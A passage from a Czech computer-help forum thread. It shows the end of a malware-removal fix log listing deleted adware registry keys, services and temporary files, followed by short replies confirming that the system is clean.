HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{B9A6127D-16DE-481F-B9CA-4B397968F86A} => removed successfully
HKLM\Software\Classes\CLSID\{B9A6127D-16DE-481F-B9CA-4B397968F86A} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BA398AD4-309C-4915-9C6C-60140565F949} => removed successfully
HKLM\Software\Classes\CLSID\{BA398AD4-309C-4915-9C6C-60140565F949} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BA7DE47C-7957-4F39-85B5-BDADF2C1F23D} => removed successfully
HKLM\Software\Classes\CLSID\{BA7DE47C-7957-4F39-85B5-BDADF2C1F23D} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BF82F267-1D54-46D3-B76F-22D6A302F0EB} => removed successfully
HKLM\Software\Classes\CLSID\{BF82F267-1D54-46D3-B76F-22D6A302F0EB} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BFE3BE80-727C-44AB-99DE-BAF4905AD5F9} => removed successfully
HKLM\Software\Classes\CLSID\{BFE3BE80-727C-44AB-99DE-BAF4905AD5F9} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{C0095A98-BEAC-4C7D-89CD-23EDC7F1B0C1} => removed successfully
HKLM\Software\Classes\CLSID\{C0095A98-BEAC-4C7D-89CD-23EDC7F1B0C1} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{C5FCA41F-794E-418D-B3AE-C5D2A9AB42A9} => removed successfully
HKLM\Software\Classes\CLSID\{C5FCA41F-794E-418D-B3AE-C5D2A9AB42A9} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{C6404912-B3FD-49D2-A88E-B88706C2E34A} => removed successfully
HKLM\Software\Classes\CLSID\{C6404912-B3FD-49D2-A88E-B88706C2E34A} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{CBE76AAC-7419-4CDE-98F3-48926A7E9121} => removed successfully
HKLM\Software\Classes\CLSID\{CBE76AAC-7419-4CDE-98F3-48926A7E9121} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{CC0BD598-A1C5-475E-AEB4-9A0CC3C53476} => removed successfully
HKLM\Software\Classes\CLSID\{CC0BD598-A1C5-475E-AEB4-9A0CC3C53476} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{CEDE0664-DEDC-4FA7-A393-3A2258C3D6A5} => removed successfully
HKLM\Software\Classes\CLSID\{CEDE0664-DEDC-4FA7-A393-3A2258C3D6A5} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{CFD8262B-801B-4471-B023-D1EA7C06C2B6} => removed successfully
HKLM\Software\Classes\CLSID\{CFD8262B-801B-4471-B023-D1EA7C06C2B6} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{D0FAF6B0-BE3C-4C6D-B8BD-E307B77D2678} => removed successfully
HKLM\Software\Classes\CLSID\{D0FAF6B0-BE3C-4C6D-B8BD-E307B77D2678} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{D46AAFD7-49B7-4EDA-8081-F4ED3B3B5580} => removed successfully
HKLM\Software\Classes\CLSID\{D46AAFD7-49B7-4EDA-8081-F4ED3B3B5580} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{E13E38A8-753A-4FD1-904A-066F681EDC1F} => removed successfully
HKLM\Software\Classes\CLSID\{E13E38A8-753A-4FD1-904A-066F681EDC1F} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{E6138BC0-A1E9-47D4-B000-FA1B4F043F92} => removed successfully
HKLM\Software\Classes\CLSID\{E6138BC0-A1E9-47D4-B000-FA1B4F043F92} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{E8D0F6D5-572F-4F61-A09D-85D1CF0BA2FA} => removed successfully
HKLM\Software\Classes\CLSID\{E8D0F6D5-572F-4F61-A09D-85D1CF0BA2FA} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{EBF29334-C208-4510-9CA2-4E7D84F02AB4} => removed successfully
HKLM\Software\Classes\CLSID\{EBF29334-C208-4510-9CA2-4E7D84F02AB4} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{EF0BA1F2-5C7B-4FC4-B685-50C92BCD1FC4} => removed successfully
HKLM\Software\Classes\CLSID\{EF0BA1F2-5C7B-4FC4-B685-50C92BCD1FC4} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{F05B18BC-48EC-4676-A4EF-2B0779FBC7C8} => removed successfully
HKLM\Software\Classes\CLSID\{F05B18BC-48EC-4676-A4EF-2B0779FBC7C8} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{F068E404-672E-429C-A601-117CA8E6F64B} => removed successfully
HKLM\Software\Classes\CLSID\{F068E404-672E-429C-A601-117CA8E6F64B} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{F08DC883-0E75-4743-926F-07C2C076133F} => removed successfully
HKLM\Software\Classes\CLSID\{F08DC883-0E75-4743-926F-07C2C076133F} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{FBFB7078-3DAC-4B24-8CF6-2B36D1202F93} => removed successfully
HKLM\Software\Classes\CLSID\{FBFB7078-3DAC-4B24-8CF6-2B36D1202F93} => not found
C:\Users\Radim\AppData\Roaming\Mozilla\Firefox\naweriweentcofise\Profiles\GQD9zH3G.default\Profiles\GQD9zH3G.default => path removed successfully
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Clients\StartMenuInternet\ChromeHTML => removed successfully
WiserIso => Unable to stop service.
HKLM\System\CurrentControlSet\Services\WiserIso => removed successfully
WiserIso => service removed successfully
HKLM\System\CurrentControlSet\Services\iSafeKrnlMon => removed successfully
iSafeKrnlMon => service removed successfully
HKLM\System\CurrentControlSet\Services\JszipProtect => removed successfully
JszipProtect => service removed successfully
C:\WINDOWS\LastGood.Tmp => moved successfully
C:\WINDOWS\system32\{F33C3B9B-72AF-418A-B3FD-560646F7CDA2}.bat => moved successfully
"C:\WINDOWS\System32\Tasks\{13B27974-850F-429D-8474-B89E6AB4248F}" => not found
"C:\WINDOWS\System32\Tasks\{05CD7012-09EF-4D71-BB5D-4054E9B7C3DC}" => not found
"C:\WINDOWS\System32\Tasks\{C9E0EEC1-BDC8-45D5-8B41-CCC7817DD33A}" => not found
"C:\WINDOWS\System32\Tasks\{D20BA10B-ED49-4FFF-8443-5FFA687CC72A}" => not found
C:\ProgramData\fnnegffbdniflckhmjifljomfnnjhhgd => moved successfully
C:\Users\Radim\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini => moved successfully

=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 35961802 B
Java, Flash, Steam htmlcache => 36546624 B
Windows/system/drivers => 1320853 B
Edge => 0 B
Chrome => 0 B
Firefox => 710054253 B
Opera => 371581342 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 278600 B
systemprofile32 => 5945 B
LocalService => 16781752 B
NetworkService => 0 B
Spravce => 204286327 B
Radim => 53483382 B

RecycleBin => 0 B
EmptyTemp: => 1.3 GB temporary data Removed.

================================

Result of scheduled files to move (Boot Mode: Normal) (Date&Time: 01-08-2019 21:47:34)

Result of scheduled keys to remove after reboot:

HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 => could not remove, key could be protected
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AD4C5429E10F4FF6C01840C20ABA344D7401209F => could not remove, key could be protected
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\DB77E5CFEC34459146748B667C97B185619251BA => could not remove, key could be protected
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF => could not remove, key could be protected

==== End of Fixlog 21:47:34 ====

#10 Příspěvek od **Rudy** » 02 srp 2019 09:10

Smazáno. Log by již měl být OK.

kovadlina11 · #11 Příspěvek od **kovadlina11** » 02 srp 2019 11:30

Děkuji moc už je to i znát.

#12 Příspěvek od **Rudy** » 02 srp 2019 11:58

Rádo se stalo!

VIRY.CZ

Dobrý den prosím o kontrolu logu děkuji .

Dobrý den prosím o kontrolu logu děkuji .

Re: Dobrý den prosím o kontrolu logu děkuji .

Re: Dobrý den prosím o kontrolu logu děkuji .

Re: Dobrý den prosím o kontrolu logu děkuji .

Re: Dobrý den prosím o kontrolu logu děkuji .

Re: Dobrý den prosím o kontrolu logu děkuji .

Re: Dobrý den prosím o kontrolu logu děkuji .

Re: Dobrý den prosím o kontrolu logu děkuji .

Re: Dobrý den prosím o kontrolu logu děkuji .

Re: Dobrý den prosím o kontrolu logu děkuji .

Re: Dobrý den prosím o kontrolu logu děkuji .

Re: Dobrý den prosím o kontrolu logu děkuji .